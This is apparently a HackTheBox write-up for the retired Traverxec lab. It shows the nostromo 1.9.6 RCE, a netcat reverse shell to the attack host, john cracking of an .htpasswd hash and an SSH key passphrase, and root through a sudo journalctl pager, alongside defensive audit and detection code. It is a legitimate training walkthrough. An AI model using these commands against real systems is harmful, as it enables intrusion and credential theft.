These are my notes for the Traverxec (Retired) Box on HackTheBox.

Credits: shout-out to tedd_918 and hunterbot for the assist.



  1. Enumerating the system thoroughly and methodically is imperative, e.g. sudo -l, find -user <username> (for files owned by that user)
  2. Learn and document cracking techniques to speed things up, e.g. hashcat, ssh2john (new to me)
  3. Get better at SSH key vector techniques, e.g. how to find keys, crack keys, and use keys



Run it all: sudo nmap -v -Pn -p- -sC -sV -O --min-rate=5000 -oN nmap-traverxec.txt

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-title: TRAVERXEC
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6

The http-server-header line gives me the version, and browsing the website confirms it: the footer of the page reads nostromo 1.9.6 at Port 80.


Use searchsploit to find exploits:

└─$ searchsploit nostromo 1.9.6
--------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------- ---------------------------------
nostromo 1.9.6 - Remote Code Execution | multiple/remote/
--------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Pull it down:

└─$ searchsploit -m 47837
Exploit: nostromo 1.9.6 - Remote Code Execution
Path: /usr/share/exploitdb/exploits/multiple/remote/
File Type: Python script, ASCII text executable

Copied to: /home/kali/Documents/RxHack/HTB/BOXES/TRAVERXEC/

I open the script to edit it and see:

# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link:
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278

#!/usr/bin/env python

import sys
import socket

art = """

So I Google and find

Test it out, and I can get remote command execution on the target:

└─$ python3 ./
usage: [-h] host port [cmd]
error: the following arguments are required: host, port

└─$ python3 ./ 80 whoami
[+] Connecting to target
[+] Sending malicious payload
HTTP/1.1 200 OK
Date: Thu, 24 Mar 2022 09:20:54 GMT
Server: nostromo 1.9.6
Connection: close



reverse shell (netcat)

We get a reverse shell from the target back to our attack host:

└─$ python3 ./ 80 "nc 443 -e /bin/bash"
[+] Connecting to target
[+] Sending malicious payload

Set up our listener, and upgrade our shell once we're in there:

└─$ sudo rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 37170
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$


I try these manual find one-liners first, looking for world-writable directories and SUID binaries:

# World writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o=w -type d 2>/dev/null

# World executable directories
find / -perm -o=x -type d 2>/dev/null

# World writable and executable directories
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null

# SUID binaries (any file with the setuid bit set)
find / -perm /4000 2>/dev/null


From my attack host I run sudo python3 -m http.server 80 in the directory where my tools are, and then wget linpeas from the reverse shell.

I run linpeas and go through the output:

╔══════════╣ SUID - Check easy privesc, exploits and write perms           
strings Not Found
strace Not Found
-rwsr-xr-x 1 root root 427K Oct 6 2019 /usr/lib/openssh/ssh-keysign
-r-sr-xr-x 1 root root 14K Nov 12 2019 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14K Nov 12 2019 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 50K Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 154K Oct 12 2019 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10

This looks interesting:

╔══════════╣ Analyzing Htpasswd Files (limit 70)                                                                   
-rw-r--r-- 1 root bin 41 Oct 25 2019 /var/nostromo/conf/.htpasswd



Using John the Ripper with the rockyou.txt wordlist on the hash copied to my attack host:

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:39 12.80% (ETA: 20:31:49) 0g/s 50608p/s 50608c/s 50608C/s auytun..autsang123
0g 0:00:00:42 13.74% (ETA: 20:31:50) 0g/s 50443p/s 50443c/s 50443C/s AVISALARI..AUGUST6
0g 0:00:03:05 65.97% (ETA: 20:31:25) 0g/s 50083p/s 50083c/s 50083C/s breech89..breeanna91
Nowonly4me (david)
1g 0:00:03:31 DONE (2022-04-05 20:30) 0.004736g/s 50107p/s 50107c/s 50107C/s Noyoudo..November^
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I try su - david and ssh david@<target>, but this password doesn't work for either.


review output

Run linpeas again and see what else I can find:

╔══════════╣ Executing Linux Exploit Suggester                                                                                                                                                                                                
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2019-13272] PTRACE_TRACEME

Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL:
Comments: Requires an active PolKit agent.

nostromo config files

So, after a few hints from Tedd in chat, I review the /var/nostromo/conf/ folder, and the config file contains this:

# HOMEDIRS [OPTIONAL]

homedirs /home
homedirs_public public_www

According to the nostromo documentation, this means each user's /home/<user>/public_www directory is served by the web server, so the www-data process can reach those directories.

public folders

Go to /home/david/public_www:

cd /home/david/public_www
index.html protected-file-area
ls -al
total 16
drwxr-xr-x 3 david david 4096 Oct 25 2019 .
drwx--x--x 5 david david 4096 Oct 25 2019 ..
-rw-r--r-- 1 david david 402 Oct 25 2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25 2019 protected-file-area
cd protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$


ssh keys

In the /home/david/public_www folder we found a backup of the user's SSH keys.

Copy the *.tgz to /tmp and then untar it:

tar xvf backup-ssh-identity-files.tgz

I copied id_rsa to my local machine, then ran ssh -i ./id_rsa david@<target>.

The cracked .htpasswd password doesn't work as the key passphrase either, so we try to crack the private key itself (id_rsa).

Use ssh2john to convert the id_rsa file into a john-crackable format: python2 /usr/share/john/ ../keys/id_pub > id_pub.hash

$ john --wordlist=/usr/share/wordlists/rockyou.txt id_pub.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (../keys/id_pub)
1g 0:00:00:36 DONE (2022-04-05 21:33) 0.02737g/s 392600p/s 392600c/s 392600C/s a6_123..*7¡Vamos!
Session completed
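The john output above reports Cost 1 (KDF/cipher) = 0, i.e. a legacy PEM key whose passphrase is stretched with a single MD5 pass, which is what made a rockyou passphrase feasible in 36 seconds. As an added example (not code from these notes), a small Python audit that reads a private key file and reports its format, KDF and rounds so such keys can be found before they leak; the sample headers are constructed and the 16-round threshold (ssh-keygen's default) is my assumption.

```python
# Added example (not from the original notes): classify how an OpenSSH private key is
# protected. john's "Cost 1 ... is 0" above means a legacy PEM key stretched with a
# single MD5 pass, which is why it cracked so quickly. Sample keys are constructed.
import base64
import struct

PEM_HEADERS = tuple(f"-----BEGIN {t} PRIVATE KEY-----" for t in ("RSA", "DSA", "EC"))
OPENSSH_HEADER = "-----BEGIN OPENSSH PRIVATE KEY-----"
OPENSSH_FOOTER = "-----END OPENSSH PRIVATE KEY-----"

def _ssh_string(b):                       # SSH wire format: uint32 length + bytes
    return struct.pack(">I", len(b)) + b
def _read_string(blob, off):
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n

def audit_ssh_key(text):
    """Return format, encryption, KDF, KDF rounds and a 'weak' verdict for a key file."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if lines[0] in PEM_HEADERS:
        # PEM encryption derives the cipher key with one MD5 pass: always weak
        enc = any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines)
        return {"format": "pem", "encrypted": enc, "kdf": "md5" if enc else "none",
                "rounds": 1 if enc else 0, "weak": True}
    if lines[0] == OPENSSH_HEADER:
        blob = base64.b64decode("".join(l for l in lines[1:] if l != OPENSSH_FOOTER))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfopts, _ = _read_string(blob, off)
        rounds = 0
        if kdf == b"bcrypt":                  # kdfoptions = string salt || uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh", "encrypted": cipher != b"none", "kdf": kdf.decode(),
                "rounds": rounds, "weak": cipher == b"none" or rounds < 16}
    raise ValueError("unrecognised private key file")

def make_openssh_header(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Construct an openssh-key-v1 prefix (no real key material) to exercise the audit."""
    opts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(opts)
            + struct.pack(">I", 1) + _ssh_string(b"") + _ssh_string(b""))
    return "\n".join([OPENSSH_HEADER, base64.b64encode(blob).decode(), OPENSSH_FOOTER])

LEGACY_PEM = "\n".join([  # constructed legacy header like the cracked key; body is a placeholder
    "-----BEGIN RSA PRIVATE KEY-----", "Proc-Type: 4,ENCRYPTED",
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF", "", "AAAA",
    "-----END RSA PRIVATE KEY-----"])
```

Run audit_ssh_key() over the key files in a backup or home directory and regenerate anything it flags as weak with ssh-keygen in the new format.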

Retry ssh with the cracked key passphrase:

$ ssh -i ./id_rsa david@<target>
Enter passphrase for key './id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$


journalctl less

There's a script in david's ~/bin directory with this command: /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
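The sudoers rule that grants that command is not shown in these notes. As an added example (not from the original), the rule reconstructed from the command line above, which is an assumption, beside a hardened version of it:

```sudoers
# Assumed rule, reconstructed from the command in david's script (not shown in the notes).
# When stdout is a terminal, journalctl hands its output to a pager (less by default)
# that runs as root, and an interactive root pager is a well-known way out to a root shell.
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service

# Hardened: make --no-pager part of the permitted argument list. sudo matches the
# arguments exactly, so david can no longer run the command without it and the pager
# never starts. Confirm the effective rule afterwards with: sudo -l (as david).
david ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
```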

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2022-04-05 04:25:57 EDT, end at Tue 2022-04-05 06:22:22 EDT. --
Apr 05 04:56:24 traverxec sudo[5475]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 05 04:56:24 traverxec sudo[5475]: www-data : command not allowed ; TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 05 04:56:25 traverxec nologin[5516]: Attempted login by UNKNOWN on UNKNOWN
Apr 05 05:07:22 traverxec su[12115]: pam_unix(su-l:auth): authentication failure; logname= uid=33 euid=0 tty=pts/1 ruser=www-data r
Apr 05 05:07:24 traverxec su[12115]: FAILED SU (to root) www-data on pts/1
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
# cd /root
# ls
nostromo_1.9.6-1.deb root.txt
# cat root.txt
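The journal output above also records the earlier sudo and su attempts from the www-data shell, which is exactly what a defender should be alerting on. As an added example (not code from these notes), a Python detector over those line shapes; the sample lines are copied from the journal output above, and the service-account list is an assumption to tune per host.

```python
# Added example (not from the original notes): flag the sudo/su failures that the
# journalctl output above contains. SAMPLE_LINES are copied from that output;
# SERVICE_ACCOUNTS is an assumption to tune per host.
import re

SERVICE_ACCOUNTS = {"www-data", "nobody"}

# Patterns follow the exact line shapes in the journal output above
PATTERNS = (
    ("sudo denied", re.compile(r"sudo\[\d+\]: (?P<user>\S+) : command not allowed ;.*COMMAND=(?P<cmd>\S+)")),
    ("sudo auth failure", re.compile(r"sudo\[\d+\]: pam_unix\(sudo:auth\): .*password for \[(?P<user>[^\]]+)\]")),
    ("su to root failed", re.compile(r"su\[\d+\]: FAILED SU \(to root\) (?P<user>\S+) on (?P<tty>\S+)")),
)

def classify(line):
    """Return (severity, kind, user) for a journal line, or None if it is not a sudo/su failure."""
    for kind, rx in PATTERNS:
        m = rx.search(line)
        if m:
            user = m.group("user")
            # A web-server account asking for root is a web-shell symptom, not a typo
            severity = "high" if user in SERVICE_ACCOUNTS else "medium"
            return severity, kind, user
    return None

def scan(lines):
    """Return one (timestamp, severity, kind, user) tuple per matching line, in log order."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line[:15],) + verdict)   # syslog-style stamp, e.g. 'Apr 05 04:56:24'
    return hits

SAMPLE_LINES = [  # copied from the journalctl output above
    "Apr 05 04:56:24 traverxec sudo[5475]: pam_unix(sudo:auth): auth could not identify password for [www-data]",
    "Apr 05 04:56:24 traverxec sudo[5475]: www-data : command not allowed ; TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=list",
    "Apr 05 04:56:25 traverxec nologin[5516]: Attempted login by UNKNOWN on UNKNOWN",
    "Apr 05 05:07:24 traverxec su[12115]: FAILED SU (to root) www-data on pts/1",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(*hit)
```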